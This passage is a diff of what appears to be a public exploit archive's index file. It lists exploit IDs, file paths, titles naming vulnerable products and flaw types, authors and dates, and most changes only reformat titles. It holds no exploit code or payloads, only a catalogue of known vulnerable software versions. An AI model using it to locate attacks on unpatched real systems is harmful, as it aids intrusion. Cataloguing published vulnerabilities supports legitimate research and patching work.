Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0 @@ -31472,11 +31472,11 @@ id,file,description,date,author,platform,type,port 34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0 34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0 34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 'q' Parameter Cross Site Scripting Vulnerability",2009-05-25,SmOk3,php,webapps,0 -34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0 +34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 - Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 Directory Traversal Vulnerability",2010-11-01,"John Leitch",windows,remote,0 34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure Vulnerability",2010-11-01,"Francois Harvey",php,webapps,0 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 Directory Traversal Vulnerability",2010-11-01,"John Leitch",multiple,remote,0 -34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress 'lib_ajax.php' Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 +34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 Cross Site Scripting and SQL Injection Vulnerabilities",2010-10-30,MustLive,php,webapps,0 34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 Arbitrary File Upload and Cross Site Scripting Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass Vulnerability",2010-11-02,"Nick Freeman",multiple,remote,0 @@ -31498,26 +31498,26 @@ id,file,description,date,author,platform,type,port 34970,platforms/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",php,webapps,0 34971,platforms/asp/webapps/34971.txt,"Angel Learning Management System 7.3 'pdaview.asp' Cross Site Scripting Vulnerability",2010-11-05,"Wesley Kerfoot",asp,webapps,0 34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 'id' Parameter SQL Injection Vulnerability",2010-11-05,jos_ali_joe,php,webapps,0 -34973,platforms/php/webapps/34973.txt,"FeedList 2.61.01 for WordPress 'handler_image.php' Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 +34973,platforms/php/webapps/34973.txt,"FeedList 2.61.01 for WordPress - 'handler_image.php' Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34974,platforms/php/webapps/34974.txt,"WP Survey And Quiz Tool 1.2.1 for WordPress Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34975,platforms/php/webapps/34975.txt,"SEO Tools Plugin for WordPress 3.0 'file' Parameter Directory Traversal Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34976,platforms/php/webapps/34976.txt,"Vodpod Video Gallery 3.1.5 for WordPress 'vodpod_gallery_thumbs.php' Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34977,platforms/php/webapps/34977.txt,"WordPress jRSS Widget Plugin 1.1.1 'url' Parameter Information Disclosure Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34978,platforms/windows/remote/34978.c,"Silo 2.1.1 'wintab32.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-11-08,"Gjoko Krstic",windows,remote,0 -34979,platforms/php/remote/34979.php,"PHP 5.3.x 'mb_strcut()' Function Information Disclosure Vulnerability",2010-11-07,"Mateusz Kocielski",php,remote,0 -34980,platforms/novell/dos/34980.py,"Novell GroupWise 8.0 Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0 +34979,platforms/php/remote/34979.php,"PHP 5.3.x - 'mb_strcut()' Function Information Disclosure Vulnerability",2010-11-07,"Mateusz Kocielski",php,remote,0 +34980,platforms/novell/dos/34980.py,"Novell GroupWise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0 34981,platforms/ios/webapps/34981.txt,"Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities",2014-10-15,Vulnerability-Lab,ios,webapps,0 34982,platforms/win32/local/34982.rb,"Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation",2014-10-15,metasploit,win32,local,0 34984,platforms/php/webapps/34984.py,"Drupal Core <= 7.32 - SQL Injection (#1)",2014-10-16,fyukyuk,php,webapps,0 34985,platforms/php/remote/34985.txt,"pfSense 2 Beta 4 'graph.php' Multiple Cross Site Scripting Vulnerabilities",2010-11-05,"dave b",php,remote,0 -34986,platforms/hardware/remote/34986.txt,"D-Link DIR-300 Multiple Security Bypass Vulnerabilities",2010-11-09,"Karol Celia",hardware,remote,0 +34986,platforms/hardware/remote/34986.txt,"D-Link DIR-300 - Multiple Security Bypass Vulnerabilities",2010-11-09,"Karol Celia",hardware,remote,0 34987,platforms/linux/local/34987.c,"Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure Vulnerability",2010-11-09,"Dan Rosenberg",linux,local,0 34988,platforms/php/webapps/34988.txt,"PHPShop 2.1 EE 'name_new' Parameter Cross Site Scripting Vulnerability",2010-11-10,MustLive,php,webapps,0 -34989,platforms/php/webapps/34989.txt,"WeBid 0.85P1 Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps,0 +34989,platforms/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps,0 34990,platforms/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 Cross Site Scripting Vulnerability",2010-11-09,thelightcosine,php,webapps,0 34992,platforms/php/webapps/34992.txt,"Drupal Core <= 7.32 - SQL Injection (#2)",2014-10-17,"Claudio Viviani",php,webapps,0 34993,platforms/php/webapps/34993.php,"Drupal Core <= 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps,0 -34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 Multiple Cross Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 +34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 34995,platforms/php/webapps/34995.txt,"Simea CMS 'index.php' SQL Injection Vulnerability",2010-11-16,Cru3l.b0y,php,webapps,0 34996,platforms/php/webapps/34996.txt,"Raised Eyebrow CMS 'venue.php' SQL Injection Vulnerability",2010-11-16,Cru3l.b0y,php,webapps,0 34997,platforms/windows/remote/34997.txt,"DServe Multiple Cross Site Scripting Vulnerabilities",2010-11-16,Axiell,windows,remote,0 @@ -31527,15 +31527,15 @@ id,file,description,date,author,platform,type,port 35001,platforms/windows/remote/35001.txt,"SAP NetWeaver 7.0 SQL Monitor Multiple Cross Site Scripting Vulnerabilities",2010-11-17,a.polyakov,windows,remote,0 35002,platforms/windows/remote/35002.html,"VLC Media Player 1.1.x Calling Convention Remote Buffer Overflow Vulnerability",2010-11-02,shinnai,windows,remote,0 35003,platforms/multiple/remote/35003.txt,"IBM OmniFind 'command' Parameter Cross Site Scripting Vulnerability",2010-11-09,"Fatih Kilic",multiple,remote,0 -35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2010-11-18,"High-Tech Bridge SA",php,webapps,0 +35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross Site Scripting Vulnerabilities",2010-11-18,"High-Tech Bridge SA",php,webapps,0 35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0 35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0 35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products DLL Loading Arbitrary Code Execution Vulnerability",2010-11-19,"Gjoko Krstic",windows,remote,0 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 'report.cgi' SQL Injection Vulnerability",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0 -35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 'pdf.php' SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 +35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 - 'pdf.php' SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 35010,platforms/osx/local/35010.c,"Apple iOS <= 4.0.2 Networking Packet Filter Rules Local Privilege Escalation Vulnerability",2010-11-22,Apple,osx,local,0 35011,platforms/linux/remote/35011.txt,"Apache Tomcat <= 7.0.4 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities",2010-11-22,"Adam Muntner",linux,remote,0 -35012,platforms/multiple/webapps/35012.txt,"ZyXEL P-660R-T1 V2 'HomeCurrent_Date' Parameter Cross-Site Scripting Vulnerability",2010-11-23,"Usman Saeed",multiple,webapps,0 +35012,platforms/multiple/webapps/35012.txt,"ZyXEL P-660R-T1 V2 - 'HomeCurrent_Date' Parameter Cross-Site Scripting Vulnerability",2010-11-23,"Usman Saeed",multiple,webapps,0 35013,platforms/linux/dos/35013.c,"Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service Vulnerability",2010-11-24,"Vegard Nossum",linux,dos,0 35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 WiFi Key Security Bypass Vulnerability",2010-11-24,"Gaurav Saha",hardware,remote,0 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 'email.cgi' Cross Site Scripting Vulnerability",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0 @@ -31545,8 +31545,8 @@ id,file,description,date,author,platform,type,port 35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0 35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0 -35022,platforms/php/webapps/35022.txt,"4homepages 4images 1.7.x 'categories.php' Parameter SQL Injection Vulnerability",2010-11-29,"Ahmed Atif",php,webapps,0 -35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 +35022,platforms/php/webapps/35022.txt,"4homepages 4images 1.7.x - 'categories.php' Parameter SQL Injection Vulnerability",2010-11-29,"Ahmed Atif",php,webapps,0 +35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component SQL Injection and Local File Include Vulnerabilities",2010-11-30,XroGuE,php,webapps,0 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 'car_make' Parameter Cross Site Scripting Vulnerability",2010-11-29,"Underground Stockholm",php,webapps,0 35026,platforms/php/webapps/35026.txt,"Joomla Store Directory 'id' Parameter SQL Injection Vulnerability",2010-11-30,XroGuE,php,webapps,0 @@ -31564,11 +31564,11 @@ id,file,description,date,author,platform,type,port 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous ",windows,local,0 35041,platforms/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",php,webapps,0 35042,platforms/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross Site Scripting Vulnerabilities",2014-10-23,"AutoSec Tools",php,webapps,0 -35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 Multiple Cross Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 -35044,platforms/php/webapps/35044.txt,"Alguest 1.1 Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0 +35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 - Multiple Cross Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 +35044,platforms/php/webapps/35044.txt,"Alguest 1.1 - Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0 35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 'InstallWizard.aspx' Cross Site Scripting Vulnerability",2010-12-03,"Richard Brain",asp,webapps,0 35046,platforms/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitary File Upload via CSRF",2014-10-23,"Emmanuel Law",php,webapps,0 -35047,platforms/hardware/webapps/35047.txt,"Dell SonicWall GMS 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0 +35047,platforms/hardware/webapps/35047.txt,"Dell SonicWall Gms 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0 35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 'ArticlesTablelist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 'start' Parameter SQL Injection Vulnerability",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31584,7 +31584,7 @@ id,file,description,date,author,platform,type,port 35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0 35063,platforms/php/webapps/35063.txt,"Zimplit CMS zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 -35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 +35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 'pluginurl' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0 35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0 35068,platforms/hardware/remote/35068.txt,"pfSense pkg_edit.php id Parameter XSS",2010-11-08,"dave b",hardware,remote,0 @@ -31596,7 +31596,7 @@ id,file,description,date,author,platform,type,port 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0 35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0 35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 -35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 +35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80 35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585 35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80 @@ -31610,7 +31610,7 @@ id,file,description,date,author,platform,type,port 35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection Vulnerability",2010-12-09,jos_ali_joe,php,webapps,0 35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection Vulnerability",2010-12-09,FL0RiX,php,webapps,0 35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection Vulnerability",2010-12-10,FL0RiX,php,webapps,0 -35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0 +35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0 35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross Site Request Forgery Vulnerability",2010-12-10,"John Leitch",multiple,remote,0 35093,platforms/cgi/webapps/35093.txt,"BizDir v.05.10 'f_srch' Parameter Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0 35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31628,7 +31628,7 @@ id,file,description,date,author,platform,type,port 35107,platforms/cfm/webapps/35107.txt,"Mura CMS Multiple Cross Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0 35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 'tags.php' Cross Site Scripting Vulnerability",2010-12-12,TEAMELITE,php,webapps,0 35109,platforms/php/webapps/35109.txt,"PHP TopSites 2.1 'rate.php' Cross Site Scripting and SQL Injection Vulnerabilities",2010-12-13,"c0de Hunters",php,webapps,0 -35110,platforms/php/webapps/35110.txt,"BlogCFC 5.9.6.001 Multiple Cross Site Scripting Vulnerabilities",2010-12-14,"Richard Brain",php,webapps,0 +35110,platforms/php/webapps/35110.txt,"BlogCFC 5.9.6.001 - Multiple Cross Site Scripting Vulnerabilities",2010-12-14,"Richard Brain",php,webapps,0 35111,platforms/php/webapps/35111.txt,"slickMsg Cross Site Scripting and HTML Injection Vulnerabilities",2010-12-15,"Aliaksandr Hartsuyeu",php,webapps,0 35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0 35113,platforms/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80 @@ -31637,14 +31637,14 @@ id,file,description,date,author,platform,type,port 35116,platforms/php/webapps/35116.txt,"HP Insight Diagnostics Online Edition 8.4 'search.php' CVE-2010-4111 Cross Site Scripting Vulnerability",2010-12-15,"Richard Brain",php,webapps,0 35117,platforms/php/webapps/35117.txt,"BLOG:CMS 4.2.1 e Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 35118,platforms/php/webapps/35118.txt,"phpRS 'model-kits.php' SQL Injection Vulnerability",2010-12-16,KnocKout,php,webapps,0 -35119,platforms/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 Remote Source Code Information Disclosure Vulnerability",2010-12-17,wsn1983,windows,remote,0 -35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 +35119,platforms/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 - Remote Source Code Information Disclosure Vulnerability",2010-12-17,wsn1983,windows,remote,0 +35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 - Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0 35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0 35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0 35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0 35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0 -35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 +35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"Mauricio Correa",jsp,webapps,9090 35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS Vulnerability",2014-10-31,"Ravi Rajput",hardware,webapps,0 35129,platforms/php/webapps/35129.txt,"Who's Who Script - CSRF Exploit (Add Admin Account)",2014-10-31,"ZoRLu Bugrahan",php,webapps,0 @@ -31652,11 +31652,11 @@ id,file,description,date,author,platform,type,port 35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0 35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 -35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x 'quicksearch_ContentContent' Parameter HTML Injection Vulnerability",2010-12-21,"High-Tech Bridge SA",php,webapps,0 +35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection Vulnerability",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0 35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0 35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 -35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - XSS Vulnerability",2014-11-02,evi1m0,php,webapps,0 +35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - XSS Vulnerability",2014-11-02,evi1m0,php,webapps,0 35140,platforms/php/webapps/35140.txt,"MyBB 1.6 search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35141,platforms/php/webapps/35141.txt,"MyBB 1.6 private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross Site Scripting Vulnerability",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31670,23 +31670,23 @@ id,file,description,date,author,platform,type,port 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) ""Patch"" DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100 35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0 -35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 +35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0 35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass, Reflected XSS, Stored XSS Vulnerability",2014-11-05,"Narendra Bhati",php,webapps,0 -35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 0 - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0 +35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 - - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0 35161,platforms/linux/local/35161.txt,"Linux Kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (#2)",2012-01-12,zx2c4,linux,local,0 -35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 +35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-01,d3c0der,windows,dos,0 35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 'zend_strtod()' Function Floating-Point Value Denial of Service Vulnerability",2011-01-03,"Rick Regan",php,dos,0 35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 'getURL.php' SQL Injection Vulnerability",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0 35166,platforms/windows/remote/35166.c,"Ace Video Workshop 1.2.0.0 'ir50_lcs.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-03,d3c0der,windows,remote,0 -35167,platforms/php/webapps/35167.txt,"Joomla 1.0.x 'ordering' Parameter Cross-Site Scripting Vulnerability",2011-01-06,"Aung Khant",php,webapps,0 +35167,platforms/php/webapps/35167.txt,"Joomla 1.0.x - 'ordering' Parameter Cross-Site Scripting Vulnerability",2011-01-06,"Aung Khant",php,webapps,0 35168,platforms/asp/webapps/35168.txt,"BlogEngine.NET 1.6 Directory Traversal Vulnerability and Information Disclosure Vulnerability",2011-01-05,"Deniz Cevik",asp,webapps,0 -35169,platforms/jsp/webapps/35169.txt,"Openfire 3.6.4 Multiple Cross-Site Scripting Vulnerabilities",2011-01-05,"Walikar Riyaz Ahemed Dawalmalik",jsp,webapps,0 +35169,platforms/jsp/webapps/35169.txt,"Openfire 3.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-05,"Walikar Riyaz Ahemed Dawalmalik",jsp,webapps,0 35170,platforms/hardware/remote/35170.txt,"Lexmark X651de Printer Ready Message Value HTML Injection Vulnerability",2011-01-06,"dave b",hardware,remote,0 -35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 Multiple DLL Loading Arbitrary Code Execution Vulnerability",2011-01-05,d3c0der,windows,remote,0 +35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution Vulnerability",2011-01-05,d3c0der,windows,remote,0 35172,platforms/php/webapps/35172.txt,"PHP MicroCMS 1.0.1 'page_text' Parameter Cross Site Scripting Vulnerability",2011-01-06,"High-Tech Bridge SA",php,webapps,0 35173,platforms/linux/dos/35173.txt,"MINIX 3.3.0 Local Denial of Service PoC",2014-11-06,nitr0us,linux,dos,0 35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0 @@ -31698,7 +31698,7 @@ id,file,description,date,author,platform,type,port 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution",2014-11-06,metasploit,php,remote,80 35184,platforms/hardware/remote/35184.py,"Belkin n750 jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 35185,platforms/php/webapps/35185.txt,"WonderCMS 0.3.3 'editText.php' Cross Site Scripting Vulnerability",2011-01-04,"High-Tech Bridge 